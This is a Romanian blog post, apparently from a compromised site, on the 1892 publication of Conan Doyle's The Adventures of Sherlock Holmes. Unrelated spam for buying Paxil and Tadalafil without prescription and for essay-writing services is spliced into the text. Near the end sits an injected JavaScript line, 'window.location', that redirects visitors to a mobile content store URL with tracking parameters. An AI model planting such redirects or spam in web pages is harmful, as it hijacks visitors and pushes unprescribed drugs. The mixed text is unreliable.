Într-o zi de 31 octombrie…

Order Paxil Prescription Medication Online for the treatment of depression helpful essay writing services at the Lowest Price Guaranteed from CanadaDrugPharmacy.com.

…in 1892, scriitorul si medicul britanic Sir Arthur Conan Doyle publica volumul de povestiri Aventurile lui Sherlock Holmes, o colectie de 12 povestiri politiste avandu-l in rolul principal pe faimosul detectiv. Order Tadalafil Online Without A Prescription Cheap. Men’s Health. Free Online Medical Consultations, Cholesterol, Free Airmail Or Courier Shipping, Diners.

doyle_arthur_conan-aventurile_lui_sherlock_holmes_vol_1-7246

Cartea originala a fost ilustrata de Sidney Paget. Acestea sunt primele povestiri scurte despre Sherlock Holmes. Ele au fost publicate initial ca simple povestiri in revista Strand Magazine in perioada iulie 1891 – iunie 1892, apoi in volum, in Marea Britanie, intr-un tiraj initial de 14.500 de exemplare. Cartea a fost publicata si in S.U.A. Sherlock Holmes a devenit faimos pentru cunostintele sale profunde in cele mai variate domenii, spiritul sau de observatie remarcabil, profunzimea gandirii sale si intelegerea logica a celor mai variate cazuri si intamplari. Holmes este probabil cel mai faimos detectiv fictiv si unul dintre cele mai cunoscute si universal recunoscute personaje literare. In total, Conan Doyle a scris patru romane si cincizeci si sase de povestiri sau nuvele in care apare Sherlock Holmes. Acest personaj literar a devenit atat de faimos de-a lungul timpului incat a devenit, se pare, cel mai jucat personaj de catre cei mai multi actori. In acelasi timp, potrivit unei estimari a ziarului The Times, dupa 1964 vanzarile in intreaga lume a povestirilor cu Sherlock Holmes au trecut pe locul doi, dupa Biblie, care este cea mai vanduta carte a tuturor timpurilor.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *